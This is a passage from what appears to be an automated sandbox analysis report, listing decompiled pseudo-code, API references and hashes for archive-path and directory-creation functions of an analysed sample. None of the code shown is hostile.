                                                                                                                    0x00b15c9f
                                                                                                                    0x00b15caf
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b15caf
                                                                                                                    0x00b15ca1
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B15C75
                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00000000,?,00000000), ref: 00B15C97
                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,00000000), ref: 00B15CA8
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00B15CE3
                                                                                                                    • GetLastError.KERNEL32 ref: 00B15CF1
                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00B15D4B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$CreateDirectory$H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 798237638-0
                                                                                                                    • Opcode ID: b20bd52d4f8b687108a6dfac19a18e204ce47083a79f40a942487792401cfdd0
                                                                                                                    • Instruction ID: 4b7932e525b275e8fbce54815846b1fb1b07dc3edc8a28d88e9621a712ebac3a
                                                                                                                    • Opcode Fuzzy Hash: b20bd52d4f8b687108a6dfac19a18e204ce47083a79f40a942487792401cfdd0
                                                                                                                    • Instruction Fuzzy Hash: 9331E431900614EADF20AFA4EC9ABFD77F5EF90300FE404E8E505671A2DB255AC5DB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B30621 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 213COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E00B30621(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
				intOrPtr _t111;
				signed int _t122;
				void* _t137;
				void* _t143;
				void* _t151;
				signed char _t158;
				void* _t160;
				void* _t162;
				signed int _t172;
				intOrPtr _t189;
				intOrPtr* _t219;
				signed int _t225;
				signed int _t226;
				signed int _t231;
				void* _t234;

				L00B7F140(E00B8478B, _t234);
				_push(__ebx);
				E00B56896(_t234 - 0x18);
				_t166 = 0;
				 *(_t234 - 4) = 0;
				E00B2EFE3(_t234 - 0xdc); // executed
				 *((intOrPtr*)(_t234 - 0x44)) =  *((intOrPtr*)(_t234 + 0x18));
				_push(_t234 - 0xdc);
				_push( *((intOrPtr*)(_t234 + 8)));
				 *(_t234 - 4) = 1;
				_t111 = E00B2F3F7(__ecx, __edx); // executed
				_t172 = 0xc;
				 *((intOrPtr*)(_t234 + 0x18)) = _t111;
				memcpy( *(_t234 + 0x14), _t234 - 0xa4, _t172 << 2);
				if(_t111 == 0) {
					_t225 = 0;
					__eflags =  *(_t234 - 0xb4);
					if( *(_t234 - 0xb4) > 0) {
						do {
							_t158 =  *( *((intOrPtr*)( *((intOrPtr*)(_t234 - 0xb8)) + _t225 * 4)) + 0x20) >> 4;
							__eflags = _t158 & 0x00000001;
							if((_t158 & 0x00000001) == 0) {
								_t160 = L00B2EF0D(_t234 - 0xdc, _t234 - 0x24, _t225);
								 *(_t234 - 4) = 2;
								E00B56B33(_t234 - 0x18);
								_push(_t160);
								_t162 = E00B11524(_t234 - 0x18);
								 *(_t234 - 4) = 1;
								E00B11E89(_t162,  *((intOrPtr*)(_t234 - 0x24)));
							}
							_t225 = _t225 + 1;
							__eflags = _t225 -  *(_t234 - 0xb4);
						} while (_t225 <  *(_t234 - 0xb4));
					}
					 *(_t234 - 4) =  *(_t234 - 4) & 0x00000000;
					L17();
					__eflags =  *((intOrPtr*)(_t234 - 0x14)) - _t166;
					if(__eflags == 0) {
						_push(_t166);
						_push( *0xb8ae24);
						E00B30B3C(_t234 - 0x24, __eflags);
						_push(0xb91428);
						_push(_t234 - 0x24);
						L00B7F160();
					}
					E00B56896(_t234 - 0x3c);
					_t226 = 0;
					__eflags =  *((intOrPtr*)(_t234 - 0x14)) - _t166;
					 *(_t234 - 4) = 3;
					if(__eflags > 0) {
						do {
							E00B12D90(_t234 - 0x24);
							 *(_t234 - 4) = 4;
							E00B16058( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t234 - 0x18)) + _t226 * 4)))), _t234 - 0x24);
							E00B56B33(_t234 - 0x3c);
							_push(_t234 - 0x24);
							_t151 = E00B11524(_t234 - 0x3c);
							 *(_t234 - 4) = 3;
							E00B11E89(_t151,  *((intOrPtr*)(_t234 - 0x24)));
							_t226 = _t226 + 1;
							__eflags = _t226 -  *((intOrPtr*)(_t234 - 0x14));
						} while (__eflags < 0);
					}
					 *(_t234 - 0x30) = _t166;
					 *(_t234 - 0x2c) = _t166;
					 *(_t234 - 0x28) = _t166;
					 *(_t234 - 4) = 5;
					L00B3DF5A(_t234 - 0x3c, _t234 - 0x30, __eflags);
					E00B36CB9( *((intOrPtr*)(_t234 + 0xc)));
					E00B4EF37( *((intOrPtr*)(_t234 + 0xc)),  *(_t234 - 0x2c));
					_t219 =  *((intOrPtr*)(_t234 + 0x10));
					E00B36CB9(_t219);
					_t118 = E00B4EF37(_t219,  *(_t234 - 0x2c));
					__eflags =  *(_t234 - 0x2c);
					if( *(_t234 - 0x2c) <= 0) {
						L14:
						E00B11E89(_t118,  *(_t234 - 0x30));
						 *(_t234 - 4) =  *(_t234 - 4) & 0x00000000;
						L00B41B84(_t166, _t234 - 0x3c);
						 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
						L00B41B84(_t166, _t234 - 0x18);
						_t122 = 0;
						__eflags = 0;
						goto L15;
					} else {
						do {
							_t231 =  *( *(_t234 - 0x30) + _t166 * 4) << 2;
							_push( *((intOrPtr*)(_t231 +  *((intOrPtr*)(_t234 - 0x18)))));
							E00B11524( *((intOrPtr*)(_t234 + 0xc)));
							_push( *((intOrPtr*)(_t231 +  *((intOrPtr*)(_t234 - 0x3c)))));
							_t118 = E00B11524(_t219);
							__eflags = _t166;
							if(_t166 <= 0) {
								goto L13;
							} else {
								__eflags = E00B142B1( *((intOrPtr*)( *((intOrPtr*)( *_t219 + _t166 * 4)))),  *((intOrPtr*)( *((intOrPtr*)( *_t219 + _t166 * 4 - 4)))));
								if(__eflags == 0) {
									_t189 = _t234 - 0x24;
									_push( *((intOrPtr*)( *((intOrPtr*)( *_t219 + _t166 * 4)))));
									_push("Duplicate archive path:");
									E00B30B3C(_t189, __eflags);
									_push(0xb91428);
									_push(_t234 - 0x24);
									L00B7F160();
									_t137 = L00B7F140(E00B847C1, _t234);
									_push(_t189);
									_push(_t231);
									_t232 = _t189;
									 *((intOrPtr*)(_t234 - 0x10)) = _t189;
									 *(_t234 - 4) = 3;
									E00B11E89(_t137,  *((intOrPtr*)(_t189 + 0x8c)));
									L00B2F0B1(_t189 + 0x68);
									 *(_t234 - 4) = 2;
									E00B11E89(E00B11E89(E00B30C74(_t166, _t232 + 0x24),  *((intOrPtr*)(_t232 + 0x18))),  *((intOrPtr*)(_t232 + 0xc)));
									_t102 = _t234 - 4;
									 *_t102 =  *(_t234 - 4) | 0xffffffff;
									__eflags =  *_t102;
									_t143 = L00B41B84(_t166, _t232);
									 *[fs:0x0] =  *((intOrPtr*)(_t234 - 0xc));
									return _t143;
								} else {
									goto L13;
								}
							}
							goto L18;
							L13:
							_t166 = _t166 + 1;
							__eflags = _t166 -  *(_t234 - 0x2c);
						} while (_t166 <  *(_t234 - 0x2c));
						goto L14;
					}
				} else {
					 *(_t234 - 4) =  *(_t234 - 4) & 0;
					L17();
					 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
					L00B41B84(0, _t234 - 0x18);
					_t122 =  *((intOrPtr*)(_t234 + 0x18));
					L15:
					 *[fs:0x0] =  *((intOrPtr*)(_t234 - 0xc));
					return _t122;
				}
				L18:
			}


















                                                                                                                    0x00b30626
                                                                                                                    0x00b30631
                                                                                                                    0x00b3063b
                                                                                                                    0x00b30640
                                                                                                                    0x00b30648
                                                                                                                    0x00b3064b
                                                                                                                    0x00b30655
                                                                                                                    0x00b3065e
                                                                                                                    0x00b30661
                                                                                                                    0x00b30664
                                                                                                                    0x00b30668
                                                                                                                    0x00b3067a
                                                                                                                    0x00b3067b
                                                                                                                    0x00b3067e
                                                                                                                    0x00b30680
                                                                                                                    0x00b306a4
                                                                                                                    0x00b306a6
                                                                                                                    0x00b306ac
                                                                                                                    0x00b306ae
                                                                                                                    0x00b306ba
                                                                                                                    0x00b306bd
                                                                                                                    0x00b306bf
                                                                                                                    0x00b306cc
                                                                                                                    0x00b306d6
                                                                                                                    0x00b306da
                                                                                                                    0x00b306e2
                                                                                                                    0x00b306e3
                                                                                                                    0x00b306e8
                                                                                                                    0x00b306ef
                                                                                                                    0x00b306f4
                                                                                                                    0x00b306f5
                                                                                                                    0x00b306f6
                                                                                                                    0x00b306f6
                                                                                                                    0x00b306ae
                                                                                                                    0x00b306fe
                                                                                                                    0x00b30708
                                                                                                                    0x00b3070d
                                                                                                                    0x00b30710
                                                                                                                    0x00b30712
                                                                                                                    0x00b30716
                                                                                                                    0x00b3071c
                                                                                                                    0x00b30724
                                                                                                                    0x00b30729
                                                                                                                    0x00b3072a
                                                                                                                    0x00b3072a
                                                                                                                    0x00b30732
                                                                                                                    0x00b30737
                                                                                                                    0x00b30739
                                                                                                                    0x00b3073c
                                                                                                                    0x00b30740
                                                                                                                    0x00b30742
                                                                                                                    0x00b30745
                                                                                                                    0x00b30750
                                                                                                                    0x00b3075b
                                                                                                                    0x00b30763
                                                                                                                    0x00b3076e
                                                                                                                    0x00b3076f
                                                                                                                    0x00b30774
                                                                                                                    0x00b3077b
                                                                                                                    0x00b30780
                                                                                                                    0x00b30782
                                                                                                                    0x00b30782
                                                                                                                    0x00b30742
                                                                                                                    0x00b30787
                                                                                                                    0x00b3078a
                                                                                                                    0x00b3078d
                                                                                                                    0x00b30796
                                                                                                                    0x00b3079a
                                                                                                                    0x00b307a5
                                                                                                                    0x00b307ae
                                                                                                                    0x00b307b3
                                                                                                                    0x00b307bb
                                                                                                                    0x00b307c3
                                                                                                                    0x00b307c8
                                                                                                                    0x00b307cc
                                                                                                                    0x00b30818
                                                                                                                    0x00b3081b
                                                                                                                    0x00b30820
                                                                                                                    0x00b30828
                                                                                                                    0x00b3082d
                                                                                                                    0x00b30834
                                                                                                                    0x00b30839
                                                                                                                    0x00b30839
                                                                                                                    0x00000000
                                                                                                                    0x00b307ce
                                                                                                                    0x00b307ce
                                                                                                                    0x00b307dc
                                                                                                                    0x00b307df
                                                                                                                    0x00b307e2
                                                                                                                    0x00b307ec
                                                                                                                    0x00b307ef
                                                                                                                    0x00b307f4
                                                                                                                    0x00b307f6
                                                                                                                    0x00000000
                                                                                                                    0x00b307f8
                                                                                                                    0x00b3080e
                                                                                                                    0x00b30810
                                                                                                                    0x00b3084e
                                                                                                                    0x00b30854
                                                                                                                    0x00b30856
                                                                                                                    0x00b3085b
                                                                                                                    0x00b30863
                                                                                                                    0x00b30868
                                                                                                                    0x00b30869
                                                                                                                    0x00b30873
                                                                                                                    0x00b30878
                                                                                                                    0x00b30879
                                                                                                                    0x00b3087a
                                                                                                                    0x00b3087c
                                                                                                                    0x00b30885
                                                                                                                    0x00b3088c
                                                                                                                    0x00b30895
                                                                                                                    0x00b3089d
                                                                                                                    0x00b308b1
                                                                                                                    0x00b308b6
                                                                                                                    0x00b308b6
                                                                                                                    0x00b308b6
                                                                                                                    0x00b308be
                                                                                                                    0x00b308c7
                                                                                                                    0x00b308cf
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b30810
                                                                                                                    0x00000000
                                                                                                                    0x00b30812
                                                                                                                    0x00b30812
                                                                                                                    0x00b30813
                                                                                                                    0x00b30813
                                                                                                                    0x00000000
                                                                                                                    0x00b307ce
                                                                                                                    0x00b30682
                                                                                                                    0x00b30682
                                                                                                                    0x00b3068b
                                                                                                                    0x00b30690
                                                                                                                    0x00b30697
                                                                                                                    0x00b3069c
                                                                                                                    0x00b3083b
                                                                                                                    0x00b30841
                                                                                                                    0x00b30849
                                                                                                                    0x00b30849
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B30626
                                                                                                                      • Part of subcall function 00B2EFE3: __EH_prolog.LIBCMT ref: 00B2EFE8
                                                                                                                      • Part of subcall function 00B2F3F7: __EH_prolog.LIBCMT ref: 00B2F3FC
                                                                                                                    • _CxxThrowException.MSVCRT(?,00B91428), ref: 00B3072A
                                                                                                                      • Part of subcall function 00B3086E: __EH_prolog.LIBCMT ref: 00B30873
                                                                                                                    Strings
                                                                                                                    • Duplicate archive path:, xrefs: 00B30856
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$ExceptionThrow
                                                                                                                    • String ID: Duplicate archive path:
                                                                                                                    • API String ID: 2366012087-4000988232
                                                                                                                    • Opcode ID: 151e641013bc2276131c693b3fd417df0066529898eede1e10ec3ef9c850ff8e
                                                                                                                    • Instruction ID: 815e2d32452927b2c1d970745a426adad737908b7eedb1ebba4f303a26e0e365
                                                                                                                    • Opcode Fuzzy Hash: 151e641013bc2276131c693b3fd417df0066529898eede1e10ec3ef9c850ff8e
                                                                                                                    • Instruction Fuzzy Hash: 12816A31D00159DBCF15EFA8D892ADDBBF5EF48300F2041E9E516632A1DB30AE45CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B14B04 Relevance: 7.7, APIs: 5, Instructions: 234COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1543 b14b04-b14b1d __EH_prolog 1544 b14b34-b14b45 call b14385 1543->1544 1545 b14b1f-b14b2f _CxxThrowException 1543->1545 1547 b14b4a-b14b6a 1544->1547 1545->1544 1548 b14b7a-b14b7f 1547->1548 1549 b14b6c-b14b78 call b150c8 1547->1549 1551 b14b81-b14b83 1548->1551 1552 b14b8e 1548->1552 1554 b14b92-b14bac call b12d90 1549->1554 1551->1554 1555 b14b85-b14b8c call b14596 1551->1555 1552->1554 1560 b14bdc-b14be0 1554->1560 1561 b14bae-b14bb7 1554->1561 1555->1552 1555->1554 1562 b14ca4-b14cb6 call b14a59 1560->1562 1563 b14be6-b14c01 call b14dae 1560->1563 1561->1560 1564 b14bb9-b14bc0 1561->1564 1571 b14cb8-b14cc8 call b1521c call b12f78 1562->1571 1572 b14ccd-b14cd1 1562->1572 1573 b14c11-b14c17 1563->1573 1574 b14c03-b14c05 1563->1574 1564->1560 1567 b14bc2-b14bd3 wcscmp 1564->1567 1567->1560 1570 b14bd5 1567->1570 1570->1560 1571->1572 1576 b14cd3-b14cd7 1572->1576 1577 b14d2f 1572->1577 1579 b14c19-b14c2d wcscmp 1573->1579 1580 b14c5c-b14c61 1573->1580 1574->1573 1578 b14c07-b14c09 1574->1578 1584 b14cd9-b14cdd 1576->1584 1585 b14cea-b14d2d call b36cb9 call b12e16 call b56b33 call b11524 call b11e89 1576->1585 1583 b14d32-b14dab call b14f89 call b14755 call b41b84 call b11e89 call b41b84 1577->1583 1578->1573 1586 b14c0b-b14c0e 1578->1586 1587 b14c3f 1579->1587 1588 b14c2f-b14c3d wcscmp 1579->1588 1580->1562 1581 b14c63-b14c6f 1580->1581 1589 b14c81-b14ca2 call b13171 call b11089 call b150ee 1581->1589 1590 b14c71-b14c74 1581->1590 1584->1577 1593 b14cdf-b14ce8 1584->1593 1585->1583 1586->1573 1595 b14c42-b14c48 1587->1595 1588->1587 1588->1595 1589->1562 1589->1581 1590->1589 1596 b14c76-b14c7f call b14596 1590->1596 1593->1577 1593->1585 1595->1579 1600 b14c4a-b14c4e 1595->1600 1596->1562 1596->1589 1600->1580 1605 b14c50-b14c56 1600->1605 1610 b14c59 1605->1610 1611 b14c58 1605->1611 1610->1580 1611->1610
                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E00B14B04(intOrPtr __ecx) {
				void* __ebx;
				intOrPtr _t117;
				intOrPtr _t118;
				void* _t134;
				void* _t136;
				signed int _t146;
				void* _t152;
				signed int _t156;
				intOrPtr* _t158;
				signed char _t162;
				char _t168;
				intOrPtr _t171;
				intOrPtr _t210;
				signed int _t213;
				void* _t214;
				intOrPtr _t219;
				wchar_t** _t220;
				void* _t222;

				L00B7F140(E00B82C50, _t222);
				 *((intOrPtr*)(_t222 - 0x20)) = __ecx;
				_t171 =  *((intOrPtr*)(_t222 + 0x10));
				_t227 =  *((intOrPtr*)(_t171 + 4));
				if( *((intOrPtr*)(_t171 + 4)) == 0) {
					_push(0xb902c0);
					_push(_t222 + 8);
					 *(_t222 + 8) = "Empty file path";
					L00B7F160();
				}
				 *((intOrPtr*)(_t222 - 0x30)) = 0;
				 *(_t222 - 0x2c) = 0;
				 *((intOrPtr*)(_t222 - 0x28)) = 0;
				 *(_t222 - 4) = 0;
				E00B14385(_t171, _t222 - 0x30, _t227); // executed
				_t117 =  *((intOrPtr*)(_t222 + 0x14));
				 *(_t222 - 0xd) = 1;
				_t173 =  *((intOrPtr*)( *((intOrPtr*)(_t222 - 0x30)) +  *(_t222 - 0x2c) * 4 - 4));
				 *(_t222 + 0x13) = 1;
				asm("movsw");
				asm("movsb");
				if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t222 - 0x30)) +  *(_t222 - 0x2c) * 4 - 4)) + 4)) != 0) {
					_t118 =  *((intOrPtr*)(_t117 + 2));
					__eflags = _t118 - 1;
					if(_t118 == 1) {
						L7:
						_t25 = _t222 + 0x13;
						 *_t25 =  *(_t222 + 0x13) & 0x00000000;
						__eflags =  *_t25;
						L8:
						E00B12D90(_t222 - 0x3c);
						 *(_t222 - 0x1c) =  *(_t222 - 0x1c) | 0xffffffff;
						 *(_t222 - 4) = 1;
						if( *(_t222 - 0x2c) >= 3) {
							_t158 =  *((intOrPtr*)(_t222 - 0x30));
							if( *((intOrPtr*)( *_t158 + 4)) == 0 &&  *((intOrPtr*)( *((intOrPtr*)(_t158 + 4)) + 4)) == 0 && wcscmp( *( *(_t158 + 8)), 0xb8938c) == 0) {
								 *(_t222 - 0x1c) = 2;
							}
						}
						if( *(_t222 + 8) == 2) {
							L32:
							_t210 =  *((intOrPtr*)(_t222 - 0x20));
							_t217 = E00B14A59(_t210, _t222 - 0x3c);
							if(_t121 < 0) {
								_t217 =  *(_t210 + 4);
								L00B12F78(L00B1521C(_t210), _t222 - 0x3c);
							}
							if( *(_t222 + 8) == 2 ||  *(_t222 - 0x2c) != 0 && ( *(_t222 - 0x2c) != 1 ||  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t222 - 0x30)))) + 4)) != 0)) {
								_t168 =  *((intOrPtr*)(_t222 - 0x10));
							} else {
								E00B36CB9(_t222 - 0x30);
								_t136 = L00B12E16(_t222 - 0x48, 0xb89390);
								 *(_t222 - 4) = 2;
								E00B56B33(_t222 - 0x30);
								_push(_t136);
								E00B11E89(E00B11524(_t222 - 0x30),  *((intOrPtr*)(_t222 - 0x48)));
								 *(_t222 - 0xd) = 1;
								 *(_t222 + 0x13) = 1;
								 *((char*)(_t222 - 0xf)) = 1;
								_t168 = 0;
							}
							 *((intOrPtr*)(_t222 - 0x58)) = 0;
							 *((intOrPtr*)(_t222 - 0x54)) = 0;
							 *((intOrPtr*)(_t222 - 0x50)) = 0;
							 *(_t222 - 4) = 3;
							L00B14F89(_t222 - 0x58, _t222 - 0x30);
							 *((char*)(_t222 - 0x4a)) =  *(_t222 + 0x13);
							 *((char*)(_t222 - 0x4b)) =  *(_t222 - 0xd);
							 *((char*)(_t222 - 0x49)) =  *((intOrPtr*)(_t222 - 0xf));
							 *((char*)(_t222 - 0x4c)) = _t168;
							E00B14755( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t222 - 0x20)))) + _t217 * 4)) + 0xc,  *((intOrPtr*)(_t222 + 0xc)), _t222 - 0x58,  *(_t222 - 0x1c));
							 *(_t222 - 4) = 1;
							E00B11E89(L00B41B84(_t168, _t222 - 0x58),  *((intOrPtr*)(_t222 - 0x3c)));
							 *(_t222 - 4) =  *(_t222 - 4) | 0xffffffff;
							_t134 = L00B41B84(_t168, _t222 - 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t222 - 0xc));
							return _t134;
						} else {
							 *(_t222 - 0x1c) =  *(_t222 - 0x1c) | 0xffffffff;
							_t213 = E00B14DAE(_t222 - 0x30);
							_t146 =  *(_t222 - 0x2c);
							 *(_t222 - 0x24) = _t213;
							 *(_t222 - 0x14) = _t213;
							if( *(_t222 + 8) != 1 && _t213 != 0 && _t146 > _t213) {
								_t46 = _t146 - 1; // 0x2
								 *(_t222 - 0x14) = _t46;
							}
							 *(_t222 - 0x18) =  *(_t222 - 0x18) | 0xffffffff;
							if(_t213 >= _t146) {
								L27:
								_t214 = 0;
								if( *(_t222 - 0x14) <= 0) {
									goto L32;
								} else {
									goto L28;
								}
								do {
									L28:
									_t219 =  *((intOrPtr*)( *((intOrPtr*)(_t222 - 0x30))));
									if( *((char*)( *((intOrPtr*)(_t222 + 0x14)) + 1)) != 0 && _t214 >=  *(_t222 - 0x24)) {
										_t152 = E00B14596(_t219);
										_t247 = _t152;
										if(_t152 != 0) {
											goto L32;
										}
									}
									L00B13171(_t222 - 0x3c, _t247, _t219);
									L00B11089(_t222 - 0x3c, 0x5c);
									L00B150EE(_t222 - 0x30, 0);
									_t214 = _t214 + 1;
								} while (_t214 <  *(_t222 - 0x14));
								goto L32;
							} else {
								do {
									_t220 =  *( *((intOrPtr*)(_t222 - 0x30)) + _t213 * 4);
									if(wcscmp( *_t220, 0xb89398) == 0 || wcscmp( *_t220, 0xb89394) == 0) {
										 *(_t222 - 0x18) = _t213;
									}
									_t156 =  *(_t222 - 0x2c);
									_t213 = _t213 + 1;
								} while (_t213 < _t156);
								if( *(_t222 - 0x18) >= 0) {
									_t56 = _t156 - 1; // 0x2
									if( *(_t222 - 0x18) != _t56) {
										_t156 = _t156 - 1;
									}
									 *(_t222 - 0x14) = _t156;
								}
								goto L27;
							}
						}
					}
					__eflags = _t118 - 2;
					if(_t118 != 2) {
						goto L8;
					}
					_t162 = E00B14596(_t173);
					__eflags = _t162;
					if(_t162 == 0) {
						goto L8;
					}
					goto L7;
				}
				 *(_t222 - 0xd) =  *(_t222 - 0xd) & 0x00000000;
				L00B150C8(_t222 - 0x30);
				goto L8;
			}





















                                                                                                                    0x00b14b09
                                                                                                                    0x00b14b11
                                                                                                                    0x00b14b15
                                                                                                                    0x00b14b1a
                                                                                                                    0x00b14b1d
                                                                                                                    0x00b14b22
                                                                                                                    0x00b14b27
                                                                                                                    0x00b14b28
                                                                                                                    0x00b14b2f
                                                                                                                    0x00b14b2f
                                                                                                                    0x00b14b36
                                                                                                                    0x00b14b39
                                                                                                                    0x00b14b3c
                                                                                                                    0x00b14b42
                                                                                                                    0x00b14b45
                                                                                                                    0x00b14b4a
                                                                                                                    0x00b14b58
                                                                                                                    0x00b14b5c
                                                                                                                    0x00b14b60
                                                                                                                    0x00b14b64
                                                                                                                    0x00b14b69
                                                                                                                    0x00b14b6a
                                                                                                                    0x00b14b7a
                                                                                                                    0x00b14b7d
                                                                                                                    0x00b14b7f
                                                                                                                    0x00b14b8e
                                                                                                                    0x00b14b8e
                                                                                                                    0x00b14b8e
                                                                                                                    0x00b14b8e
                                                                                                                    0x00b14b92
                                                                                                                    0x00b14b95
                                                                                                                    0x00b14b9a
                                                                                                                    0x00b14ba8
                                                                                                                    0x00b14bac
                                                                                                                    0x00b14bae
                                                                                                                    0x00b14bb7
                                                                                                                    0x00b14bd5
                                                                                                                    0x00b14bd5
                                                                                                                    0x00b14bb7
                                                                                                                    0x00b14be0
                                                                                                                    0x00b14ca4
                                                                                                                    0x00b14ca4
                                                                                                                    0x00b14cb2
                                                                                                                    0x00b14cb6
                                                                                                                    0x00b14cb8
                                                                                                                    0x00b14cc8
                                                                                                                    0x00b14cc8
                                                                                                                    0x00b14cd1
                                                                                                                    0x00b14d2f
                                                                                                                    0x00b14cea
                                                                                                                    0x00b14ced
                                                                                                                    0x00b14cfa
                                                                                                                    0x00b14d04
                                                                                                                    0x00b14d08
                                                                                                                    0x00b14d0d
                                                                                                                    0x00b14d19
                                                                                                                    0x00b14d1f
                                                                                                                    0x00b14d23
                                                                                                                    0x00b14d27
                                                                                                                    0x00b14d2b
                                                                                                                    0x00b14d2b
                                                                                                                    0x00b14d34
                                                                                                                    0x00b14d37
                                                                                                                    0x00b14d3a
                                                                                                                    0x00b14d44
                                                                                                                    0x00b14d48
                                                                                                                    0x00b14d53
                                                                                                                    0x00b14d59
                                                                                                                    0x00b14d5f
                                                                                                                    0x00b14d68
                                                                                                                    0x00b14d77
                                                                                                                    0x00b14d7f
                                                                                                                    0x00b14d8b
                                                                                                                    0x00b14d90
                                                                                                                    0x00b14d98
                                                                                                                    0x00b14da3
                                                                                                                    0x00b14dab
                                                                                                                    0x00b14be6
                                                                                                                    0x00b14be6
                                                                                                                    0x00b14bf6
                                                                                                                    0x00b14bf8
                                                                                                                    0x00b14bfb
                                                                                                                    0x00b14bfe
                                                                                                                    0x00b14c01
                                                                                                                    0x00b14c0b
                                                                                                                    0x00b14c0e
                                                                                                                    0x00b14c0e
                                                                                                                    0x00b14c11
                                                                                                                    0x00b14c17
                                                                                                                    0x00b14c5c
                                                                                                                    0x00b14c5c
                                                                                                                    0x00b14c61
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b14c63
                                                                                                                    0x00b14c63
                                                                                                                    0x00b14c66
                                                                                                                    0x00b14c6f
                                                                                                                    0x00b14c78
                                                                                                                    0x00b14c7d
                                                                                                                    0x00b14c7f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b14c7f
                                                                                                                    0x00b14c85
                                                                                                                    0x00b14c8f
                                                                                                                    0x00b14c99
                                                                                                                    0x00b14c9e
                                                                                                                    0x00b14c9f
                                                                                                                    0x00000000
                                                                                                                    0x00b14c19
                                                                                                                    0x00b14c19
                                                                                                                    0x00b14c21
                                                                                                                    0x00b14c2d
                                                                                                                    0x00b14c3f
                                                                                                                    0x00b14c3f
                                                                                                                    0x00b14c42
                                                                                                                    0x00b14c45
                                                                                                                    0x00b14c46
                                                                                                                    0x00b14c4e
                                                                                                                    0x00b14c50
                                                                                                                    0x00b14c56
                                                                                                                    0x00b14c58
                                                                                                                    0x00b14c58
                                                                                                                    0x00b14c59
                                                                                                                    0x00b14c59
                                                                                                                    0x00000000
                                                                                                                    0x00b14c4e
                                                                                                                    0x00b14c17
                                                                                                                    0x00b14be0
                                                                                                                    0x00b14b81
                                                                                                                    0x00b14b83
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b14b85
                                                                                                                    0x00b14b8a
                                                                                                                    0x00b14b8c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b14b8c
                                                                                                                    0x00b14b6c
                                                                                                                    0x00b14b73
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscmp$ExceptionH_prologThrow
                                                                                                                    • String ID:
